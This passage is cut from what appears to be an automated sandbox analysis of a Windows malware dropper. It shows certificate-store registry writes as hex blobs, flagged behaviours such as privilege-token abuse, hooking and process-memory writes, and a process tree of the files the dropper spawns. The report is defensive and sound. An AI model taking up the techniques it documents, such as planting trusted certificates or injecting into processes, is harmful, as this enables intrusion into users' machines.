3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E gfs0dd1ffhu.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f gfs0dd1ffhu.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe -
Runs ping.exe 1 TTPs 3 IoCs
Processes:
PING.EXEPING.EXEPING.EXEpid process 6200 PING.EXE 6896 PING.EXE 9120 PING.EXE -
Script User-Agent 32 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 445 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 447 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 501 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 547 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 551 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 573 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 574 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 491 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 492 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 506 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 570 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 572 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 484 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 561 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 577 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 446 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 459 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 559 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 581 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 482 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 487 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 500 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 565 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 575 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 448 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 488 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 498 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 549 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 564 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 578 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 457 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 576 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
rundll32.exesvchost.exerundll32.exesetups.tmpjfiag3g_gg.exeirecord.tmpmultitimer.exeprolab.tmpSHadisuxaejo.exepid process 4280 rundll32.exe 4280 rundll32.exe 484 svchost.exe 484 svchost.exe 4692 rundll32.exe 4692 rundll32.exe 5064 setups.tmp 5064 setups.tmp 4400 jfiag3g_gg.exe 4400 jfiag3g_gg.exe 4388 irecord.tmp 4388 irecord.tmp 4800 multitimer.exe 4800 multitimer.exe 4800 multitimer.exe 4800 multitimer.exe 4800 multitimer.exe 4800 multitimer.exe 4800 multitimer.exe 4800 multitimer.exe 4800 multitimer.exe 4800 multitimer.exe 4800 multitimer.exe 4800 multitimer.exe 4800 multitimer.exe 4800 multitimer.exe 4800 multitimer.exe 4800 multitimer.exe 4800 multitimer.exe 4800 multitimer.exe 1016 prolab.tmp 1016 prolab.tmp 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe 4548 SHadisuxaejo.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3020 -
Suspicious behavior: MapViewOfSection 64 IoCs
Processes:
toolspab1.exeMicrosoftEdgeCP.exeexplorer.exeexplorer.exeexplorer.exepid process 5736 toolspab1.exe 6380 MicrosoftEdgeCP.exe 3020 3020 3020 3020 3020 3020 3020 3020 7496 explorer.exe 7496 explorer.exe 7496 explorer.exe 7496 explorer.exe 7496 explorer.exe 7496 explorer.exe 7496 explorer.exe 7496 explorer.exe 7496 explorer.exe 7496 explorer.exe 7496 explorer.exe 7496 explorer.exe 3020 3020 3020 3020 7248 explorer.exe 7248 explorer.exe 7248 explorer.exe 7248 explorer.exe 7248 explorer.exe 7248 explorer.exe 7248 explorer.exe 7248 explorer.exe 7248 explorer.exe 7248 explorer.exe 7248 explorer.exe 7248 explorer.exe 3020 3020 3020 3020 7684 explorer.exe 7684 explorer.exe 7684 explorer.exe 7684 explorer.exe 7684 explorer.exe 7684 explorer.exe 7684 explorer.exe 7684 explorer.exe 7684 explorer.exe 7684 explorer.exe 7684 explorer.exe 7684 explorer.exe 3020 3020 6380 MicrosoftEdgeCP.exe 7684 explorer.exe 7684 explorer.exe 7248 explorer.exe 7248 explorer.exe 7496 explorer.exe 7496 explorer.exe 7684 explorer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Three.exeHookSetp.exerundll32.exesvchost.exerundll32.exeMicrosoft.exeppppppfy.exemultitimer.exesvchost.exeWeather.exesvchost.exedescription pid process Token: SeDebugPrivilege 2412 Three.exe Token: SeDebugPrivilege 4048 HookSetp.exe Token: SeDebugPrivilege 4280 rundll32.exe Token: SeTcbPrivilege 484 svchost.exe Token: SeDebugPrivilege 4280 rundll32.exe Token: SeDebugPrivilege 4280 rundll32.exe Token: SeDebugPrivilege 4280 rundll32.exe Token: SeDebugPrivilege 4280 rundll32.exe Token: SeDebugPrivilege 4280 rundll32.exe Token: SeDebugPrivilege 4280 rundll32.exe Token: SeDebugPrivilege 4692 rundll32.exe Token: SeDebugPrivilege 4280 rundll32.exe Token: SeDebugPrivilege 4692 rundll32.exe Token: SeDebugPrivilege 4280 rundll32.exe Token: SeDebugPrivilege 4692 rundll32.exe Token: SeDebugPrivilege 4280 rundll32.exe Token: SeDebugPrivilege 4692 rundll32.exe Token: SeDebugPrivilege 4280 rundll32.exe Token: SeDebugPrivilege 3372 Microsoft.exe Token: SeDebugPrivilege 4692 rundll32.exe Token: SeDebugPrivilege 4280 rundll32.exe Token: SeDebugPrivilege 4692 rundll32.exe Token: SeDebugPrivilege 4280 rundll32.exe Token: SeDebugPrivilege 4156 ppppppfy.exe Token: SeDebugPrivilege 4692 rundll32.exe Token: SeDebugPrivilege 4692 rundll32.exe Token: SeDebugPrivilege 4692 rundll32.exe Token: SeDebugPrivilege 4692 rundll32.exe Token: SeDebugPrivilege 4692 rundll32.exe Token: SeDebugPrivilege 4692 rundll32.exe Token: SeDebugPrivilege 4692 rundll32.exe Token: SeDebugPrivilege 4800 multitimer.exe Token: SeAuditPrivilege 2392 svchost.exe Token: SeAuditPrivilege 2392 svchost.exe Token: SeDebugPrivilege 4876 Weather.exe Token: SeDebugPrivilege 4876 Weather.exe Token: SeDebugPrivilege 4876 Weather.exe Token: SeDebugPrivilege 4876 Weather.exe Token: SeAssignPrimaryTokenPrivilege 2656 svchost.exe Token: SeIncreaseQuotaPrivilege 2656 svchost.exe Token: SeSecurityPrivilege 2656 svchost.exe Token: SeTakeOwnershipPrivilege 2656 svchost.exe Token: SeLoadDriverPrivilege 2656 svchost.exe Token: SeSystemtimePrivilege 2656 svchost.exe Token: SeBackupPrivilege 2656 svchost.exe Token: SeRestorePrivilege 2656 svchost.exe Token: SeShutdownPrivilege 2656 svchost.exe Token: SeSystemEnvironmentPrivilege 2656 svchost.exe Token: SeUndockPrivilege 2656 svchost.exe Token: SeManageVolumePrivilege 2656 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2656 svchost.exe Token: SeIncreaseQuotaPrivilege 2656 svchost.exe Token: SeSecurityPrivilege 2656 svchost.exe Token: SeTakeOwnershipPrivilege 2656 svchost.exe Token: SeLoadDriverPrivilege 2656 svchost.exe Token: SeSystemtimePrivilege 2656 svchost.exe Token: SeBackupPrivilege 2656 svchost.exe Token: SeRestorePrivilege 2656 svchost.exe Token: SeShutdownPrivilege 2656 svchost.exe Token: SeSystemEnvironmentPrivilege 2656 svchost.exe Token: SeUndockPrivilege 2656 svchost.exe Token: SeManageVolumePrivilege 2656 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2656 svchost.exe Token: SeIncreaseQuotaPrivilege 2656 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
irecord.tmpprolab.tmpgfs0dd1ffhu.exeIBInstaller_97039.tmplxsajuyiswe.tmpvict.tmpvpn.tmppid process 4388 irecord.tmp 1016 prolab.tmp 4168 gfs0dd1ffhu.exe 5596 IBInstaller_97039.tmp 6108 lxsajuyiswe.tmp 5276 vict.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp -
Suspicious use of SetWindowsHookEx 35 IoCs
Processes:
MicrosoftEdge.exewin1host.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeC247.exeC536.exeMaskVPNUpdate.exesetups.exesetups.tmpsetups.exesetups.tmpsetups.tmpvict.exeSetup3310.exeSetup3310.tmpvict.tmpcpyrix.exeSetup3310.exevict.exeSetup3310.tmpvict.tmpwin1host.exewin1host.exeSetup.exeSetup.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exepid process 4876 MicrosoftEdge.exe 5228 win1host.exe 3128 MicrosoftEdge.exe 6828 MicrosoftEdgeCP.exe 6828 MicrosoftEdgeCP.exe 6516 MicrosoftEdge.exe 6380 MicrosoftEdgeCP.exe 6380 MicrosoftEdgeCP.exe 4232 C247.exe 6956 C536.exe 7220 MaskVPNUpdate.exe 408 setups.exe 7624 setups.tmp 5940 setups.exe 5280 setups.tmp 8216 setups.tmp 8208 vict.exe 8260 Setup3310.exe 8384 Setup3310.tmp 8392 vict.tmp 8736 cpyrix.exe 8816 Setup3310.exe 8752 vict.exe 9160 Setup3310.tmp 8420 vict.tmp 6188 win1host.exe 9536 win1host.exe 9896 Setup.exe 9928 Setup.exe 7788 MicrosoftEdge.exe 6204 MicrosoftEdgeCP.exe 6204 MicrosoftEdgeCP.exe 7292 MicrosoftEdge.exe 5876 MicrosoftEdgeCP.exe 5876 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
29DEA0BA258723098A514297F4C4D0B7.exeLabPicV3.exelylal220.exeguihuali-game.exelylal220.tmpLabPicV3.tmphjjgaa.exeWScript.exerundll32.exesvchost.exe22.exeWScript.exedescription pid process target process PID 3004 wrote to memory of 2744 3004 29DEA0BA258723098A514297F4C4D0B7.exe hjjgaa.exe PID 3004 wrote to memory of 2744 3004 29DEA0BA258723098A514297F4C4D0B7.exe hjjgaa.exe PID 3004 wrote to memory of 2744 3004 29DEA0BA258723098A514297F4C4D0B7.exe hjjgaa.exe PID 3004 wrote to memory of 3104 3004 29DEA0BA258723098A514297F4C4D0B7.exe RunWW.exe PID 3004 wrote to memory of 3104 3004 29DEA0BA258723098A514297F4C4D0B7.exe RunWW.exe PID 3004 wrote to memory of 3104 3004 29DEA0BA258723098A514297F4C4D0B7.exe RunWW.exe PID 3004 wrote to memory of 2448 3004 29DEA0BA258723098A514297F4C4D0B7.exe jg7_7wjg.exe PID 3004 wrote to memory of 2448 3004 29DEA0BA258723098A514297F4C4D0B7.exe jg7_7wjg.exe PID 3004 wrote to memory of 2448 3004 29DEA0BA258723098A514297F4C4D0B7.exe jg7_7wjg.exe PID 3004 wrote to memory of 3812 3004 29DEA0BA258723098A514297F4C4D0B7.exe LabPicV3.exe PID 3004 wrote to memory of 3812 3004 29DEA0BA258723098A514297F4C4D0B7.exe LabPicV3.exe PID 3004 wrote to memory of 3812 3004 29DEA0BA258723098A514297F4C4D0B7.exe LabPicV3.exe PID 3004 wrote to memory of 4068 3004 29DEA0BA258723098A514297F4C4D0B7.exe lylal220.exe PID 3004 wrote to memory of 4068 3004 29DEA0BA258723098A514297F4C4D0B7.exe lylal220.exe PID 3004 wrote to memory of 4068 3004 29DEA0BA258723098A514297F4C4D0B7.exe lylal220.exe PID 3004 wrote to memory of 4092 3004 29DEA0BA258723098A514297F4C4D0B7.exe 22.exe PID 3004 wrote to memory of 4092 3004 29DEA0BA258723098A514297F4C4D0B7.exe 22.exe PID 3004 wrote to memory of 4092 3004 29DEA0BA258723098A514297F4C4D0B7.exe 22.exe PID 3004 wrote to memory of 204 3004 29DEA0BA258723098A514297F4C4D0B7.exe guihuali-game.exe PID 3004 wrote to memory of 204 3004 29DEA0BA258723098A514297F4C4D0B7.exe guihuali-game.exe PID 3004 wrote to memory of 204 3004 29DEA0BA258723098A514297F4C4D0B7.exe guihuali-game.exe PID 3004 wrote to memory of 4048 3004 29DEA0BA258723098A514297F4C4D0B7.exe HookSetp.exe PID 3004 wrote to memory of 4048 3004 29DEA0BA258723098A514297F4C4D0B7.exe HookSetp.exe PID 3004 wrote to memory of 2412 3004 29DEA0BA258723098A514297F4C4D0B7.exe Three.exe PID 3004 wrote to memory of 2412 3004 29DEA0BA258723098A514297F4C4D0B7.exe Three.exe PID 3812 wrote to memory of 1900 3812 LabPicV3.exe LabPicV3.tmp PID 3812 wrote to memory of 1900 3812 LabPicV3.exe LabPicV3.tmp PID 3812 wrote to memory of 1900 3812 LabPicV3.exe LabPicV3.tmp PID 4068 wrote to memory of 1264 4068 lylal220.exe lylal220.tmp PID 4068 wrote to memory of 1264 4068 lylal220.exe lylal220.tmp PID 4068 wrote to memory of 1264 4068 lylal220.exe lylal220.tmp PID 3004 wrote to memory of 4000 3004 29DEA0BA258723098A514297F4C4D0B7.exe lilalmix.exe PID 3004 wrote to memory of 4000 3004 29DEA0BA258723098A514297F4C4D0B7.exe lilalmix.exe PID 3004 wrote to memory of 4000 3004 29DEA0BA258723098A514297F4C4D0B7.exe lilalmix.exe PID 3004 wrote to memory of 736 3004 29DEA0BA258723098A514297F4C4D0B7.exe loli.exe PID 3004 wrote to memory of 736 3004 29DEA0BA258723098A514297F4C4D0B7.exe loli.exe PID 3004 wrote to memory of 736 3004 29DEA0BA258723098A514297F4C4D0B7.exe loli.exe PID 204 wrote to memory of 2924 204 guihuali-game.exe WScript.exe PID 204 wrote to memory of 2924 204 guihuali-game.exe WScript.exe PID 204 wrote to memory of 2924 204 guihuali-game.exe WScript.exe PID 1264 wrote to memory of 3372 1264 lylal220.tmp Microsoft.exe PID 1264 wrote to memory of 3372 1264 lylal220.tmp Microsoft.exe PID 1900 wrote to memory of 4156 1900 LabPicV3.tmp ppppppfy.exe PID 1900 wrote to memory of 4156 1900 LabPicV3.tmp ppppppfy.exe PID 2744 wrote to memory of 4264 2744 hjjgaa.exe jfiag3g_gg.exe PID 2744 wrote to memory of 4264 2744 hjjgaa.exe jfiag3g_gg.exe PID 2744 wrote to memory of 4264 2744 hjjgaa.exe 